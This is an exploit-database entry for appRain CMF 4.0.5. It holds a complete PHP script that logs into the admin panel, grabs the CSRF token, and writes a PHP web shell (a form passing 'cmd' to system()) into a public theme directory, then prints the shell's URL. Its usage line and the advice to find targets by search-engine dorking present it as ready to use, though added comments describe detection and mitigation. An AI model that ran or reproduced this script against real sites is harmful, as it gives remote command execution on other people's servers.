## https://sploitus.com/exploit?id=PACKETSTORM:189763
=============================================================================================================================================
| # Title : appRain CMF 4.0.5 shell upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engines.
[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.
(Related : https://packetstorm.news/files/id/178895/ Related CVE numbers: ) .
[+] save code as poc.php.
[+] Usage: php poc.php sitename.com username password
[+] PayLoad :
<?php
// PoC flow (defender's reading): authenticate to the appRain admin panel, fetch the
// anti-CSRF token of the theme "add_chunk" editor, then save a chunk whose content
// is PHP. The editor writes that content unfiltered into a .php file under a
// web-served directory (public/themes/default/), so an authenticated admin session
// turns into arbitrary code execution on the host.
if ($argc < 4) {
echo "Usage: php script.php <url> <username> <password>\n";
exit(1);
}
// Target base URL and admin credentials are taken from the command line.
$base_url = $argv[1];
$username = $argv[2];
$password = $argv[3];
// A single cURL handle is reused for every request in the script.
$session = curl_init();
$login_url = $base_url . '/admin/index.php?id=dashboard';
$login_data = [
'login' => $username,
'password' => $password,
'login_submit' => 'Log+In'
];
// Random 5-character chunk name; this becomes the file name of the written .chunk.php.
$filename = substr(str_shuffle('abcdefghijklmnopqrstuvwxyz0123456789'), 0, 5);
echo "Logging in...\n";
curl_setopt($session, CURLOPT_URL, $login_url);
curl_setopt($session, CURLOPT_POST, true);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($session);
// Login success is inferred only from the word "Dashboard" appearing in the body.
if (strpos($response, 'Dashboard') !== false) {
echo "Login successful\n";
} else {
echo "Login failed\n";
exit();
}
sleep(3);
// The vulnerable endpoint: the theme chunk editor's "add" action.
$edit_url = $base_url . '/admin/index.php?id=themes&action=add_chunk';
curl_setopt($session, CURLOPT_URL, $edit_url);
$response = curl_exec($session);
// Reads the server-issued CSRF token from the editor form. Note that the token is
// obtained and replayed from within the authenticated session, so the request is
// not cross-site; the weakness exploited here is the unrestricted file write, and
// the anti-CSRF token does nothing to prevent it.
preg_match('/input type="hidden" id="csrf" name="csrf" value="(.*?)"/', $response, $matches);
if ($matches) {
$token = $matches[1];
} else {
echo "CSRF token could not be found.\n";
exit();
}
// Chunk content submitted to the editor: a minimal web shell that passes the
// "cmd" query parameter to system(). Any PHP accepted here would be executed.
$content = '
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET[\'cmd\']))
{
system($_GET[\'cmd\']);
}
?>
</pre>
</body>
</html>
';
$edit_data = [
'csrf' => $token,
'name' => $filename,
'content' => $content,
'add_file' => 'Save'
];
echo "Preparing shell...\n";
// Detection: an admin POST to id=themes&action=add_chunk whose "content" field
// contains a PHP open tag is the observable signature of this activity.
curl_setopt($session, CURLOPT_URL, $edit_url);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($edit_data));
$response = curl_exec($session);
sleep(3);
// Only the HTTP status is checked; a 200 does not by itself prove the chunk was written.
if (curl_getinfo($session, CURLINFO_HTTP_CODE) == 200) {
// The written chunk is served directly from the public themes directory.
// Mitigation: deny PHP execution under public/themes/ at the web server, and have
// the chunk editor reject or neutralise PHP tags in submitted content.
echo "Your shell is ready: " . $base_url . "/public/themes/default/{$filename}.chunk.php\n";
} else {
echo "Failed to prepare shell.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================